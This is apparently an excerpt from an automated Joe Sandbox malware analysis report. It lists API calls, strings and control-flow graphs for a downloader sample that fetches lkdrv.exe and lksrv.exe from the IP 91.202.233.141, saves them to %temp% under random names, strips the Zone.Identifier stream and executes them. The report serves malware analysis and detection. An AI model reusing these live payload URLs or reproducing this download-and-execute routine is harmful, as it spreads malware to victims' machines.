                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                              • String ID: $D$open
                                              • API String ID: 3787208655-2182757814
                                              • Opcode ID: 432761a8a603e7415eb6209eacbcdf1249a3b817c6e1d79f233efcce56e3f3a7
                                              • Instruction ID: f059914a8eb5218b0354fa3e4700f8c34c5dab240a7abb53dbc7259cb125e340
                                              • Opcode Fuzzy Hash: 432761a8a603e7415eb6209eacbcdf1249a3b817c6e1d79f233efcce56e3f3a7
                                              • Instruction Fuzzy Hash: 38112E75E88348BBEB24DFD0CD46FDE7778AB15B01F200115FB09AE2C0D6B5AA448B65

                                              Control-flow Graph

                                              control_flow_graph 116 a31230-a3125b GetLogicalDrives 117 a31266-a3126a 116->117 118 a312d6-a312e1 117->118 119 a3126c-a3128c RegOpenKeyExW 117->119 120 a312d4 119->120 121 a3128e-a312b9 RegQueryValueExW 119->121 120->117 122 a312bb-a312bf 121->122 123 a312ca-a312ce RegCloseKey 121->123 122->123 125 a312c1-a312c7 122->125 123->120 125->123
                                              APIs
                                              • GetLogicalDrives.KERNEL32 ref: 00A31236
                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00A31284
                                              • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00A312B1
                                              • RegCloseKey.ADVAPI32(?), ref: 00A312CE
                                              Strings
                                              • NoDrives, xrefs: 00A312A8
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00A31277
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                              • API String ID: 2666887985-3471754645
                                              • Opcode ID: bd20111c606d6e18e07cbc957a505453bd6e93976ecf7aafe063001024fc4e5f
                                              • Instruction ID: c5f375295e2bb901da49a7b002dbae477743b9f958be70ec8490b1d396da8c9f
                                              • Opcode Fuzzy Hash: bd20111c606d6e18e07cbc957a505453bd6e93976ecf7aafe063001024fc4e5f
                                              • Instruction Fuzzy Hash: A311E4B1E0420AABDF14CFD1D94ABEEBBB4BB08705F108518E611A6280D7B86A45CB91

                                              Control-flow Graph

                                              control_flow_graph 126 a311b0-a311d6 GetDriveTypeW 127 a31225-a3122b 126->127 128 a311d8-a311df 126->128 129 a311e1-a311e8 128->129 130 a311ec-a31204 QueryDosDeviceW 128->130 129->130 131 a311ea 129->131 130->127 132 a31206-a3121c StrCmpNW 130->132 131->127 132->127 133 a3121e 132->133 133->127
                                              APIs
                                              • GetDriveTypeW.KERNEL32(00A3118F), ref: 00A311BD
                                              • QueryDosDeviceW.KERNEL32(00A3118F,?,00000208), ref: 00A311FC
                                              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00A31214
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.3131551771.0000000000A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A30000, based on PE: true
                                              • Associated: 00000009.00000002.3131540284.0000000000A30000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131617991.0000000000A34000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000009.00000002.3131630118.0000000000A35000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a30000_259428477.jbxd
                                              Similarity
                                              • API ID: DeviceDriveQueryType
                                              • String ID: \??\
                                              • API String ID: 1681518211-3047946824
                                              • Opcode ID: a4f7d35f0c544b9bfeda76716bf63ba930c91bb4b9962d3482842d6e3b1047e6
                                              • Instruction ID: 1272ed9c3bb95eaddcaec6c68bdb199fd82368e6efa55654db3d864e06178f60
                                              • Opcode Fuzzy Hash: a4f7d35f0c544b9bfeda76716bf63ba930c91bb4b9962d3482842d6e3b1047e6
                                              • Instruction Fuzzy Hash: 7301ECB5940208ABCF64CFD5ED49BDDB7B8AB05705F0081A9BA04A6240D6349B86CF94

                                              Callgraph

                                              Control-flow Graph

                                              APIs
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 003D10CA
                                              • wsprintfW.USER32 ref: 003D10E3
                                              • PathFileExistsW.KERNELBASE(?), ref: 003D10F3
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 003D1119
                                              • CloseHandle.KERNEL32(000000FF), ref: 003D1135
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                              • String ID: %s\afaefefaeff.txt$%temp%
                                              • API String ID: 750032643-3182922545
                                              • Opcode ID: 4b37b4e4d58abb31558f8fb25ba4673316ae086546383d09c3f3b9a0bce9e54a
                                              • Instruction ID: d687d0a9e21b2be283c5e1858cbc4950ab6b7f40556bb2806d4eaa694e0777b5
                                              • Opcode Fuzzy Hash: 4b37b4e4d58abb31558f8fb25ba4673316ae086546383d09c3f3b9a0bce9e54a
                                              • Instruction Fuzzy Hash: 210184B5940318BBD721DB60AC4AFE5733CAB44700F4045A5A715911D1D6B05F858BA6

                                              Control-flow Graph

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 003D16AE
                                                • Part of subcall function 003D10B0: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 003D10CA
                                                • Part of subcall function 003D10B0: wsprintfW.USER32 ref: 003D10E3
                                                • Part of subcall function 003D10B0: PathFileExistsW.KERNELBASE(?), ref: 003D10F3
                                                • Part of subcall function 003D1230: GetLogicalDrives.KERNEL32 ref: 003D1236
                                                • Part of subcall function 003D1230: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 003D1284
                                                • Part of subcall function 003D1230: RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 003D12B1
                                                • Part of subcall function 003D1230: RegCloseKey.ADVAPI32(?), ref: 003D12CE
                                              • wsprintfA.USER32 ref: 003D1755
                                              • strcmp.MSVCR90 ref: 003D176A
                                                • Part of subcall function 003D1150: lstrcpyW.KERNEL32(?,?), ref: 003D11A3
                                              Strings
                                              • http://91.202.233.141/lkdrv.exe, xrefs: 003D1776
                                              • http://91.202.233.141/lksrv.exe, xrefs: 003D178F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: wsprintf$CloseDrivesEnvironmentExistsExpandFileLogicalOpenPathQuerySleepStringsValuelstrcpystrcmp
                                              • String ID: http://91.202.233.141/lkdrv.exe$http://91.202.233.141/lksrv.exe
                                              • API String ID: 357889991-2508253401
                                              • Opcode ID: 2a328331203939afccd496ce6c3a138921a48f04071b83235531daf9b5de18e2
                                              • Instruction ID: 7e4083138a8911ba010e70e40918f179ad2cb2e06304f2382a66b9752d692135
                                              • Opcode Fuzzy Hash: 2a328331203939afccd496ce6c3a138921a48f04071b83235531daf9b5de18e2
                                              • Instruction Fuzzy Hash: 6E2195B6D00318BBDB22EBA4FC8A7AA7374AF00344F1441DBE51996353DA719F849F52

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 003D12F9
                                              • srand.MSVCR90 ref: 003D1300
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 003D1320
                                              • strlen.MSVCR90 ref: 003D132A
                                              • mbstowcs.MSVCR90 ref: 003D1341
                                              • rand.MSVCR90 ref: 003D1349
                                              • rand.MSVCR90 ref: 003D135D
                                              • wsprintfW.USER32 ref: 003D1384
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 003D139A
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 003D13C9
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 003D13F8
                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 003D142B
                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 003D145C
                                              • CloseHandle.KERNEL32(000000FF), ref: 003D146B
                                              • wsprintfW.USER32 ref: 003D1484
                                              • DeleteFileW.KERNEL32(?), ref: 003D1494
                                              • CloseHandle.KERNEL32(000000FF), ref: 003D14B0
                                              • InternetCloseHandle.WININET(00000000), ref: 003D14BD
                                              • InternetCloseHandle.WININET(00000000), ref: 003D14CA
                                              Strings
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36, xrefs: 003D1395
                                              • %s\%d%d.exe, xrefs: 003D1378
                                              • %temp%, xrefs: 003D131B
                                              • %s:Zone.Identifier, xrefs: 003D1478
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                              • String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                              • API String ID: 770025858-111153409
                                              • Opcode ID: 352e1a405b6d36ca1677057be56224c09b6728855b460e8fb0b1ca6edcc065ed
                                              • Instruction ID: f7419ba606f69b74e3a232f89eabe2c78c42b9c882f36e76e80afe391d97fd64
                                              • Opcode Fuzzy Hash: 352e1a405b6d36ca1677057be56224c09b6728855b460e8fb0b1ca6edcc065ed
                                              • Instruction Fuzzy Hash: A741A9B2D02314BBE721EB60EC4AFDA737DAB88701F04459AF209A6191DB749F84CF51

                                              Control-flow Graph

                                              control_flow_graph 93 3d14e0-3d152b memset GetModuleHandleW 94 3d1634 93->94 95 3d1531-3d1550 GetProcAddress 93->95 96 3d1636-3d1639 94->96 95->94 97 3d1556-3d1565 95->97 97->94 99 3d156b-3d1572 97->99 100 3d15d4-3d15db 99->100 101 3d1574-3d157b 99->101 100->94 102 3d15dd-3d1616 memset GetVersionExA 100->102 101->100 103 3d157d-3d15b6 memset GetVersionExA 101->103 102->94 104 3d1618-3d1622 102->104 103->100 105 3d15b8-3d15c2 103->105 106 3d1624-3d162e 104->106 107 3d1630-3d1632 104->107 108 3d15c4-3d15ce 105->108 109 3d15d0-3d15d2 105->109 106->94 106->107 107->96 108->100 108->109 109->96
                                              APIs
                                              • memset.MSVCR90 ref: 003D1501
                                              • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 003D1518
                                              • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 003D153D
                                              • memset.MSVCR90 ref: 003D1595
                                              • GetVersionExA.KERNEL32(0000009C), ref: 003D15AE
                                              • memset.MSVCR90 ref: 003D15F5
                                              • GetVersionExA.KERNEL32(0000009C), ref: 003D160E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: memset$Version$AddressHandleModuleProc
                                              • String ID: RtlGetVersion$ntdll.dll
                                              • API String ID: 3060919973-1489217083
                                              • Opcode ID: 1de6171384e7d50bda61018b377e1e132db42d590fa26c52bcfc451bb1842b38
                                              • Instruction ID: 41ef8922d63a9b71e1535fdf28d8ffca38c27bbc1b6054615c9b82387899b250
                                              • Opcode Fuzzy Hash: 1de6171384e7d50bda61018b377e1e132db42d590fa26c52bcfc451bb1842b38
                                              • Instruction Fuzzy Hash: DD318472C4522CABDF36CB20EC4ABE9B775AB15700F0845DAE50965281D775CF84CF91

                                              Control-flow Graph

                                              control_flow_graph 110 3d1000-3d1060 memset * 2 CreateProcessW 111 3d1071-3d1095 ShellExecuteW 110->111 112 3d1062-3d106f Sleep 110->112 114 3d1097-3d10a4 Sleep 111->114 115 3d10a6 111->115 113 3d10a8-3d10ab 112->113 114->113 115->113
                                              APIs
                                              • memset.MSVCR90 ref: 003D100E
                                              • memset.MSVCR90 ref: 003D101E
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 003D1057
                                              • Sleep.KERNEL32(000003E8), ref: 003D1067
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 003D1082
                                              • Sleep.KERNEL32(000003E8), ref: 003D109C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: Sleepmemset$CreateExecuteProcessShell
                                              • String ID: $D$open
                                              • API String ID: 3787208655-2182757814
                                              • Opcode ID: a250bd34cfcfec9ae7435778a574ae6fe827746a1b39aacf1328f1817ebd7221
                                              • Instruction ID: 39553f5bdb9de22323c0d173cb423b59f393c4f86153d4569017344bc47f73ea
                                              • Opcode Fuzzy Hash: a250bd34cfcfec9ae7435778a574ae6fe827746a1b39aacf1328f1817ebd7221
                                              • Instruction Fuzzy Hash: CC1133B6E84308BBEB11DF90EC46FDE7778AB14B01F100116FA096E2C0D6B1AE44C766

                                              Control-flow Graph

                                              control_flow_graph 116 3d1230-3d125b GetLogicalDrives 117 3d1266-3d126a 116->117 118 3d126c-3d128c RegOpenKeyExW 117->118 119 3d12d6-3d12e1 117->119 120 3d128e-3d12b9 RegQueryValueExW 118->120 121 3d12d4 118->121 122 3d12bb-3d12bf 120->122 123 3d12ca-3d12ce RegCloseKey 120->123 121->117 122->123 125 3d12c1-3d12c7 122->125 123->121 125->123
                                              APIs
                                              • GetLogicalDrives.KERNEL32 ref: 003D1236
                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 003D1284
                                              • RegQueryValueExW.ADVAPI32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 003D12B1
                                              • RegCloseKey.ADVAPI32(?), ref: 003D12CE
                                              Strings
                                              • NoDrives, xrefs: 003D12A8
                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 003D1277
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: CloseDrivesLogicalOpenQueryValue
                                              • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                              • API String ID: 2666887985-3471754645
                                              • Opcode ID: 6c068af36bea7033a1b628a24b413aeee7874281f53a3c0361630a1894315b58
                                              • Instruction ID: 129c020dc857abc58c5949ab6e32bc05a2ac793384a6b36e2b8de28159feb7fd
                                              • Opcode Fuzzy Hash: 6c068af36bea7033a1b628a24b413aeee7874281f53a3c0361630a1894315b58
                                              • Instruction Fuzzy Hash: 4A11DA71E4120AEBDB11CFD1E949BEEBBB8FB48704F10850AE511A7280D7796A45CF91

                                              Control-flow Graph

                                              control_flow_graph 126 3d11b0-3d11d6 GetDriveTypeW 127 3d11d8-3d11df 126->127 128 3d1225-3d122b 126->128 129 3d11ec-3d1204 QueryDosDeviceW 127->129 130 3d11e1-3d11e8 127->130 129->128 132 3d1206-3d121c StrCmpNW 129->132 130->129 131 3d11ea 130->131 131->128 132->128 133 3d121e 132->133 133->128
                                              APIs
                                              • GetDriveTypeW.KERNEL32(003D118F), ref: 003D11BD
                                              • QueryDosDeviceW.KERNEL32(003D118F,?,00000208), ref: 003D11FC
                                              • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 003D1214
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.3841735259.00000000003D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 003D0000, based on PE: true
                                              • Associated: 0000000A.00000002.3841648329.00000000003D0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841766770.00000000003D4000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.3841794210.00000000003D5000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_3d0000_2958729589.jbxd
                                              Similarity
                                              • API ID: DeviceDriveQueryType
                                              • String ID: \??\
                                              • API String ID: 1681518211-3047946824
                                              • Opcode ID: b15503822e8487f33c359a527a3b54d859e8aecdbe66ad780d02856a2f8bf1e6
                                              • Instruction ID: e60a431d7cd7de6cf46e2bdd95657dc17018034152b87a9d8e216f13038e3aec
                                              • Opcode Fuzzy Hash: b15503822e8487f33c359a527a3b54d859e8aecdbe66ad780d02856a2f8bf1e6
                                              • Instruction Fuzzy Hash: 4601ECB594021CABCB21DFA5EC497DDB7B8AB05705F0084AAEA05A6240D6319F85CF95